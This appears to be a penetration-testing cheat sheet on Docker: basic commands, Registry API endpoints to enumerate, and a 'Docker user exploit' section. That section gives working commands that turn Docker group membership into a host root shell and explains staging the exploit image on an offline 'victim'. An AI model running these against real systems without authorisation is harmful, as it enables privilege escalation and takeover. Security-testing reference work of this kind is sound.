General commands

Show avail­able Dock­er images

docker images

Show run­ning Dock­er instances

docker ps

Run an instance in fore­ground (debug logs are visible)

docker run -p 8080:80/tcp --name bolt11 aerth/boltcms:latest

Run an instance in the background

docker run -p 8000 --name <name> -d -t <imagename>

Open shell into an instance

docker exec -it <container_name> /bin/bash

Copy file(s)

docker cp $container:/from_container/file /tmp/

Docker registry

A Dock­er Reg­istry is a ser­vice which man­ages con­tain­ers. (Doku­men­ta­tion)

Interesting registry path

GET /v2/
GET /v2/<name>/
GET /v2/library/<name>/
GET /v2/<name>/manifests/<reference>
GET /v2/<name>/blobs/<digest>
GET /v2/<name>/blobs/uploads/<uuid>
GET /v2/_catalog
GET /v2/<name>/tags/list

Docker user exploit

The securiy mod­el of Dock­er requires that only trust­wor­thy users are in the Dock­er group. If you con­trol a user with Dock­er group mem­ber­ship, you can get a root shell with the fol­low­ing way (Source):

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

OR list all dock­er con­tain­ers with dock­er image ls and just use one of them:

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

Copy docker images

If the vic­tim does­n’t has Inter­net access (e.g. for the exploit above), then copy the images.

Down­load the image locally:

docker pull chrisfosterelli/rootplease

Pack it into a TAR file:

docker save -o /tmp/pleaseroot.tar chrisfosterelli/rootplease

Upload it to the vic­tim. There, load it:

docker load -i pleaseroot.tar

Now the image can be used.

Escape

• See Dock­er Break­out.
• See dock­er-escape-tool

Notes

Check if /v2/_catalog or /v2/<name>/tags/list ist available.

Links

• https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/
  • https://github.com/NotSoSecure/docker_fetch/ (Util­i­ty to down­load dock­er images)